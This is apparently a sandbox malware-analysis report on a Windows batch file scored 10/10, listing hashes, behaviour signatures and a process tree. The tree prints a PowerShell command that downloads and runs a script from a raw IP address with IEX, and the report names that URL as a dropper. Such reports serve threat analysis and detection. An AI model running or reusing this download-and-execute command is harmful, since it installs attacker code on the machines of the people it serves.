Analysis

  • max time kernel
    75s
  • max time network
    71s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    20-06-2020 19:10

General

  • Target

    35e5f8eb351e284b90bed66d0023236b.bat

  • Size

    214B

  • MD5

    e2fcc310d8119cd0904e78336960fa89

  • SHA1

    de619682273fc1b7211126601c0e1074cc57e246

  • SHA256

    1c34218a57d25359c281518cac60c8380aba32fbeea82e9e61585a0c33db7574

  • SHA512

    349b96ad50dbb441a256244f07e83cc22f96e212c50cf91ae17d372259c9a37af69e3b548e6a396886b6c50b26da816b897704579916deff8862c4ae77ac0fba

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\35e5f8eb351e284b90bed66d0023236b.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/35e5f8eb351e284b90bed66d0023236b');Invoke-GKXBUHZ;Start-Sleep -s 10000"
      2⤵
        PID:3796
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 704
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:3316

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3316-1-0x00000000045B0000-0x00000000045B1000-memory.dmp

      Filesize

      4KB

    • memory/3316-8-0x0000000004CE0000-0x0000000004CE1000-memory.dmp

      Filesize

      4KB

    • memory/3796-0-0x0000000000000000-mapping.dmp

    • memory/3796-2-0x0000000000000000-mapping.dmp

    • memory/3796-3-0x0000000000000000-mapping.dmp

    • memory/3796-4-0x0000000000000000-mapping.dmp

    • memory/3796-6-0x0000000000000000-mapping.dmp

    • memory/3796-5-0x0000000000000000-mapping.dmp

    • memory/3796-7-0x0000000000000000-mapping.dmp